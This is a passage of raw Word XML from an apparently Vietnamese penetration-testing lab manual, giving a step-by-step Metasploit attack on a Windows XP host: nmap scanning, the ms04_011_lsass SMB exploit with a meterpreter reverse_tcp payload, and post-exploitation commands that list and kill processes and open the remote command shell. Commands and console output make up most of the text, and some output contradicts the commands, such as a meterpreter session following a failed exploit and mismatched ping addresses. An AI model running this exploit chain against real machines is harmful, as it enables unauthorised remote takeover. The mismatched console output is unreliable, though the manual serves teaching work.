      <w:bookmarkStart w:id="26" w:name="_Toc145594633"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>hực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="5A89CE31" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B8108E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776000DB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390DD9B4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6365A9E0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E32EE42" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EB4BCC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C78136" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=0.060 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4E5FB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7C792" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; sudo nmap -v -A 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DFE967" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A0B8D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A193B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=0.060 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3156D3B0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B03C61A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chọn module exploit ứng với lỗi hệ thống. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3B202" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; use windows/smb/ms04_011_lsass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660B331" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chọn payload và thiết lập tham số.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C74F0A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 exploit(</w:t>
      </w:r>
      <w:bookmarkStart w:id="27" w:name="_Hlk19992358"/>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>windows/smb/ms04_011_lsass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>) &gt; set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573036BB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>PALOAD =&gt; win32_reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB086C3" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622ED715" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/smb/ms04_011_lsass) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set RHOSTS 192</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE1E5D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>RHOST =&gt; 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DFB88A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms04_011_lsass) &gt; set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B76F67" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>LHOST =&gt; 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939CA7E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms04_011_lsass) &gt; set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5919F1DA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực hiện khai thác lỗ hổng (exploit) để tấn công từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53602D3C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms04_011_lsass) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB425FF" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.1.10:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39228140" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] 192.168.1.110:445 - Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.110[\lsarpc]...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC55760" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[-] 192.168.1.110:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB609FD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA2286" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>msf6 exploit(windows/smb/ms04_011_lsass) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB52EE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Xâm nhập hệ thống dựa trên meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A97604" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B212D2D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; use -m P      //add thêm tập lệnh của process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CEFA41" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; help &lt;          // xem các lệnh meterpreter hỗ trợ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79636075" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; ps             // list các process mà remote machine đang chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74786854" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; kill          // tắt các process mà remote machine đang chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A475A39" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt;            // tấn công sử dụng comandline cmd của remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D125A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> execute: success, process id is 3516.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395D1C6" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> execute: allocated channel 1 for new process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D72EB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; interact 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E80FA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> interact: Switching to interactive console on 1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B6EE55" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> interact: Started interactive channel 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE201DB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> Microsoft Windows XP [Version 5.1.2600]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6DF345" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> (C) Copyright 1985-2001 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A6733" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5CDCC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> C:WINDOWS&gt;echo Meterpreter interactive channel in action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4BC69" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> echo Meterpreter interactive channel in action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211CF5EB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> Meterpreter interactive channel in action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F12EFD1" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44870EA6" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>C:WINDOWS&gt;ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C49DB89" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>Caught Ctrl-C, close interactive session? [y/N] y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0877D976" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>meterpreter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE2A4D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc1729165151"/>
      <w:bookmarkStart w:id="29" w:name="_Toc145594634"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NOTE Các lệnh chính</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="7E09D324" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>use windows/smb/ms04_011_lsass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5FFFE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6A8D1D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E399D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>use exploit/windows/smb/ms04_011_lsass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB46336" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/meterpreter/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
